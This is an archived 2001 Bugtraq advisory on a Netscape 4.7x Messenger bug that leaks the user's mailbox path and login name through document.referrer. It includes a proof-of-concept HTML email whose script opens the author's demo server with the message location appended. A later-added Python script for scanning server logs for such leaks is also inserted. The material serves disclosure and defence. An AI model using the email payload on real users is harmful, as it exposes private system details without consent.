SECURITY.NNOV: Netscape 4.7x Messenger user information retrieval

From: 3APA3A (3APA3Aat_private)
Date: Tue Jun 05 2001 - 05:01:19 PDT


    Hello bugtraq,
    
    
    There are known bugs in Netscape whose exploitation requires knowing
    the location of the user's files. This bug is not a serious one by
    itself, but it allows that location to be obtained.
    
    
    Topic                   : Netscape 4.7x user information retrieval
    Author                  : 3APA3A <3APA3Aat_private>
    Affected software       : Netscape 4.7x All Platforms
    Vendor                  : Netscape (IPlanet)
    Risk                    : Low
    Remotely Exploitable    : Yes
    Released                : 30 May 2001
    Vendor URL              : http://www.netscape.com
    SECURITY.NNOV advisories: http://www.security.nnov.ru/advisories
    
    
    
    Background:
    
    Netscape Messenger uses an internal protocol called mailbox://. The
    format of a mailbox URI is
    
    mailbox://full_path_to_user_folder?ID=some_message_d&number=somenumber
    
    This URI contains the full path to the user's mailbox, which usually
    contains the user's login name and, in the case of Windows 9x, the
    path to the Netscape installation. It is impossible to determine this
    location from JavaScript inside an e-mail message, because Netscape
    hides document.location from JavaScript.
    
    Problem:
    
    It is possible to retrieve the mailbox:// URI of the message, that is,
    to retrieve the mailbox location, the user's system login and in some
    cases the path to the Netscape installation.
    
    Details:
    
    When a link is invoked from a message, Netscape sets the
    "document.referrer" property to the URI of the message that contained
    the link. JavaScript on the target page can read this property and
    pass it to any location, together with the IP address of the calling
    machine.
    
    Exploitation:
    
    If you read this message with Netscape Messenger you can simply click
    the link http://www.security.nnov.ru/files/nsdemo.asp to see your
    mailbox location, or you can force a Netscape user to open this page
    with a message like this:
    
    -=-=-=-=-=-=-=-=-=-
    From: 3APA3A
    To: 3APA3A
    Subject: Test your Netscape
    Content-Type: text/html
    
    <html><script>
     window.open('http://www.security.nnov.ru/files/nsdemo.asp?'+escape(document.location));
    </script>
    <A
     HREF="http://www.security.nnov.ru/files/nsdemo.asp"
    >
     http://www.security.nnov.ru/files/nsdemo.asp
    </A>
    </html>
    -=-=-=-=-=-=-=-=-=-
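    As an added example (not part of the advisory, and not the nsdemo.asp
    script referenced above), the Python below lets a site operator audit
    web-server access logs for the two channels the advisory describes: a
    Referer header carrying the mailbox:// URI of the originating message,
    or that URI pasted into the query string by script in the message. The
    log lines, paths and parameter values are constructed for the example.

```python
import re
from urllib.parse import unquote, parse_qs

# Constructed Apache "combined" log lines; the mailbox:// URIs are made up
# in the shape the advisory gives: mailbox://<folder path>?id=..&number=..
SAMPLE_LOG = """\
10.0.0.5 - - [05/Jun/2001:12:00:01 +0000] "GET /files/nsdemo.asp HTTP/1.0" 200 512 "mailbox:///home/alice/nsmail/Inbox?id=1234&number=7" "Mozilla/4.76 [en] (X11; U; Linux 2.2.16 i686)"
10.0.0.6 - - [05/Jun/2001:12:00:02 +0000] "GET /files/nsdemo.asp HTTP/1.0" 200 512 "http://www.example.com/index.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
10.0.0.7 - - [05/Jun/2001:12:00:03 +0000] "GET /files/nsdemo.asp?mailbox%3A//C%7C/Program%20Files/Netscape/Users/bob/Mail/Inbox%3Fid%3D42%26number%3D3 HTTP/1.0" 200 512 "-" "Mozilla/4.77 [en] (Win98; U)"
"""

# Apache combined log format: ip ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)


def extract_mailbox_uri(value):
    """Return the percent-decoded mailbox:// URI embedded in value, or None."""
    decoded = unquote(value)
    idx = decoded.find("mailbox://")
    return decoded[idx:] if idx != -1 else None


def parse_mailbox_uri(uri):
    """Split a mailbox:// URI into the leaked folder path and its query params."""
    rest = uri[len("mailbox://"):]
    path, _, query = rest.partition("?")
    return {"path": path, "params": parse_qs(query)}


def scan_log(log_text):
    """One finding per request whose Referer or query string leaks a mailbox URI."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = m["req"].split()               # "GET /target HTTP/1.0"
        target = parts[1] if len(parts) > 1 else ""
        for source, value in (("referer", m["ref"]), ("query", target)):
            uri = extract_mailbox_uri(value)
            if uri:
                findings.append({"ip": m["ip"], "source": source,
                                 **parse_mailbox_uri(uri)})
                break
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']}: leaked via {f['source']}: {f['path']} {f['params']}")
```

    Each finding names the client address, which channel carried the leak
    and the folder path the client disclosed, so affected users can be
    identified from the log without the script itself forwarding anything.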
    
    Vendor:
    
    Netscape was contacted on May 30, 2001 via
     http://help.netscape.com/forms/bug-security.html
    No feedback was given.
    
    
    -- 
    http://www.security.nnov.ru
             /\_/\
            { . . }     |\
    +--oQQo->{ ^ }<-----+ \
    |  3APA3A  U  3APA3A   }
    +-------------o66o--+ /
                        |/
    You know my name - look up my number (The Beatles)
    



    This archive was generated by hypermail 2b30 : Tue Jun 05 2001 - 11:43:03 PDT